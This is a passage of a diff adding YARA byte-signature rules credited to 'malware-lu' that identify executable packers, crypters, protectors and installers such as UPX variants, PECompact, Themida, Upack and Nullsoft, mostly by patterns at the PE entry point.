+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0
+}
+	
+	
+rule PENinjamodified
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5D 8B C5 81 ED B2 2C 40 00 2B 85 94 3E 40 00 2D 71 02 00 00 89 85 98 3E 40 00 0F B6 B5 9C 3E 40 00 8B FD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DotFixNiceProtect21GPcHSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 FF 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 B8 ?? ?? ?? ?? 03 C5 50 B8 ?? ?? ?? ?? 03 C5 FF 10 BB ?? ?? ?? ?? 03 DD 83 C3 0C 53 50 B8 ?? ?? ?? ?? 03 C5 FF 10 6A 40 68 00 10 00 00 FF 74 24 2C 6A 00 FF D0 89 44 24 1C 61 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule EXEStealthv276WebToolMaster
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 65 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 59 4F 55 52 20 41 44 20 48 45 52 45 21 50 69 52 41 43 59 20 69 53 20 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor239DLLcompressedresources
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 68 ?? ?? ?? ?? 58 C1 C0 0F E9 ?? ?? ?? 00 87 04 24 58 89 45 FC E9 ?? ?? ?? FF FF 05 ?? ?? ?? ?? E9 ?? ?? ?? 00 C1 C3 18 E9 ?? ?? ?? ?? 8B 55 08 09 42 F8 E9 ?? ?? ?? FF 83 7D F0 01 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 34 24 5E 8B 45 FC 33 D2 56 8B F2 E9 ?? ?? ?? 00 BA ?? ?? ?? ?? E8 ?? ?? ?? 00 A3 ?? ?? ?? ?? C3 E9 ?? ?? ?? 00 C3 83 C4 04 C3 E9 ?? ?? ?? FF 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 E8 ?? ?? ?? 00 E9 ?? ?? ?? FF C1 C2 03 81 CA ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 03 C2 5A E9 ?? ?? ?? FF 81 E7 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? 89 07 E9 ?? ?? ?? ?? 0F 89 ?? ?? ?? ?? 87 14 24 5A 50 C1 C8 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnoPiX103110BaGiE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 04 C7 04 24 00 ?? ?? ?? C3 00 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 ?? ?? 00 00 10 00 00 00 00 00 00 02 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 95 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule IonicWindSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9B DB E3 9B DB E2 D9 2D 00 ?? ?? 00 55 89 E5 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePackV11XMethod2bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00 }
+	$a1 = { 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule PCGuardv500d
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 55 50 E8 00 00 00 00 5D 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 B8 30 D2 40 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 2B E8 9C EB 01 D5 9D EB 01 0B 58 60 E8 03 00 00 00 83 EB 0E EB 01 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESHiELDv0251
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5D 83 ED 06 EB 02 EA 04 8D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117DLLaPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 53 03 00 00 8D 9D 02 02 00 00 33 FF E8 ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02PEX099Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 55 83 C4 04 E8 01 00 00 00 90 5D 81 FF FF FF 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallVirtualizationSuite30XThinstallCompany
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 BA FE FF FF E9 ?? ?? ?? ?? CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA }
+	$a1 = { 9C 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 BA FE FF FF E9 ?? ?? ?? ?? CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA ?? ?? ?? ?? 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 ?? ?? ?? ?? E8 DF 00 00 00 73 1B 55 BD ?? ?? ?? ?? E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 55 56 57 C7 44 24 10 70 92 40 00 33 DB C6 44 24 14 20 FF 15 2C 70 40 00 53 FF 15 84 72 40 00 BE 00 54 43 00 BF 00 04 00 00 56 57 A3 A8 EC 42 00 FF 15 C4 70 40 00 E8 8D FF FF FF 8B 2D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 5C 71 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule SLVc0deProtectorv11SLV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 C6 00 EB C6 40 01 08 FF E0 E9 4C }
+	$a1 = { E8 01 00 00 00 A0 5D EB 01 69 81 ED 5F 1A 40 00 8D 85 92 1A 40 00 F3 8D 95 83 1A 40 00 8B C0 8B D2 2B C2 83 E8 05 89 42 01 E8 FB FF FF FF 69 83 C4 08 E8 06 00 00 00 69 E8 F2 FF FF FF F3 B9 05 00 00 00 51 8D B5 BF 1A 40 00 8B FE B9 58 15 00 00 AC 32 C1 F6 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule FreeJoinerSmallbuild031032GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 32 ?? 66 8B C3 58 E8 ?? FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SLVc0deProtectorv06SLV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 97 11 40 00 8D B5 EF 11 40 00 B9 FE 2D 00 00 8B FE AC F8 ?? ?? ?? ?? ?? ?? 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmor04600759hying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule RpolycryptbyVaska2003071841
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 58 ?? ?? ?? ?? ?? ?? ?? E8 00 00 00 58 E8 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? 04 }
+
+condition:
+		$a0
+}
+	
+	
+rule DBPEvxxxDingBoy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftwareCompressBGSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4UnextrPasswcheckVirshield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 C0 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv0399Dwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? 00 00 02 00 00 00 00 00 00 ?? 00 00 00 00 00 10 00 00 ?? 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? 00 14 00 00 00 00 ?? ?? 00 ?? ?? 00 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? 00 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? 00 ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 }
+	$a1 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
+	$a2 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 10 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? 00 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? 56 10 E2 E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 99 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule UPXModifiedstub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 84 ?? 00 00 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 88 ?? 00 00 61 E9 ?? ?? ?? FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Cryptic20Tughack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 40 00 BB ?? ?? ?? 00 B9 00 10 00 00 BA ?? ?? ?? 00 03 D8 03 C8 03 D1 3B CA 74 06 80 31 ?? 41 EB F6 FF E3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule KGBSFX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE 00 A0 46 00 8D BE 00 70 F9 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv20betaJeremyCollake
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DevCv4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 83 C4 F4 6A ?? A1 ?? ?? ?? 00 FF D0 E8 ?? FF FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule DevCv5
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 14 6A ?? FF 15 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule CRYPToCRACksPEProtectorV092LukasFleischer
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 01 00 00 00 E8 58 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 37 84 DB 75 33 8B F3 03 ?? ?? 81 3E 50 45 00 00 75 26 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UpackV037Dwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 18 10 00 00 10 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 02 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 14 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 }
+	$a1 = { 60 E8 09 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 5E 87 0E }
+	$a2 = { BE ?? ?? ?? ?? AD 50 FF ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule Obsidiumv13037ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxCompiler
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C C3 83 C3 10 2E 01 1E ?? 02 2E 03 1E ?? 02 53 1E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BJFntv13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? 3A ?? ?? 1E EB ?? CD 20 9C EB ?? CD 20 EB ?? CD 20 60 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePEtite21emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXShitv01500mhz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }
+	$a1 = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }
+	$a2 = { E8 ?? ?? ?? ?? 5E 83 C6 ?? AD 89 C7 AD 89 C1 AD 30 07 47 E2 ?? AD FF E0 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule PackmanV0001Bubbasoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? 48 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DJoinv07publicxorencryptiondrmist
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C6 05 ?? ?? 40 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoinerSmallbuild033GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 66 33 C3 66 8B C1 58 E8 AC FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AnticrackSoftwareProtectorv109ACProtect
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 83 04 24 06 C3 ?? ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnderGroundCrypterbyBooster2000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 74 3C 00 11 E8 94 F9 FF FF E8 BF FE FF FF E8 0A F3 FF FF 8B C0 }
+
+condition:
+		$a0
+}
+	
+	
+rule MicroJoiner16coban2k
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 64 8B 38 48 8B C8 F2 AF AF 8B 1F 66 33 DB 66 81 3B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WiseInstallerStubv11010291
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 40 0F 00 00 53 56 57 6A 04 FF 15 F4 30 40 00 FF 15 74 30 40 00 8A 08 89 45 E8 80 F9 22 75 48 8A 48 01 40 89 45 E8 33 F6 84 C9 74 0E 80 F9 22 74 09 8A 48 01 40 89 45 E8 EB EE 80 38 22 75 04 40 89 45 E8 80 38 20 75 09 40 80 38 20 74 FA 89 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateEXEProtector18
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB DC EE 0D 76 D9 D0 8D 16 85 D8 90 D9 D0 }
+
+condition:
+		$a0
+}
+	
+	
+rule SimpleUPXCryptorv3042005multilayerencryptionMANtiCORE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }
+	$a1 = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Themida1201compressedOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv155
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A2 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 9E 80 40 ?? BB 2D 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PolyCryptPE214b215JLabSoftwareCreationshsigned
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 6F 6C 79 43 72 79 70 74 20 50 45 20 28 63 29 20 32 30 30 34 2D 32 30 30 35 2C 20 4A 4C 61 62 53 6F 66 74 77 61 72 65 2E 00 50 00 43 00 50 00 45 }
+
+condition:
+		$a0
+}
+	
+	
+rule PECompactv156
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 90 40 ?? 87 DD 8B 85 A2 90 40 ?? 01 85 03 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 9E 90 40 ?? BB 2D 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PGMPACKv013
+{
